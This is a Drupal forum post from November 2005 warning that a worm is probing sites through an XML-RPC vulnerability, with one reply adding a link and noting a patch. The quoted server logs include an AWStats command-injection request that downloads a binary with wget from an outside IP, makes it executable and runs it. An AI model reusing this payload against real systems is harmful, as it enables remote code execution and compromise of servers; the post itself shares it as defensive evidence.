Come together with the global Drupal community in Rotterdam, 28 Sept – 1 Oct 2026. Sessions, contribution, connection, and Early Bird savings until 8 June.
By jono_howlett on
Hi all,
I'm sure the security warning on the Drupal front page is Referring to this but think its worth
another mention as there is now a worm is currenlty making the rounds which makes use of this exploit.
This morning I have had several hits on my server from the worm and it looks like it will
pick up.
Grep of access logs:
216.131.91.x - - [08/Nov/2005:12:12:09 +0000] "POST /xmlsrv/xmlrpc.php
216.131.91.x - - [08/Nov/2005:12:12:06 +0000] "POST /xmlrpc.php
216.131.91.x - - [08/Nov/2005:12:12:01 +0000] "POST /drupal/xmlrpc.php
...and several other locations as well.
Additionally:
216.131.91.x - - [08/Nov/2005:12:11:45 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%
2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%
20216%2e102%2e212%2e115;echo%20YYY;echo|
See http://vil.nai.com/vil/content/v_136821.htm for more details.
cheers
jono
Comments
RE: Worm Warning
Here's another link with some more information: http://www.lurhq.com/slapperv2.html
After searching drupal.org a bit, it looks like this xml-rpc vulnerability was patched a while ago (ca. 4.6.2). If anyone here is more knowledgable about this vulnerability and its patch status, please chime in.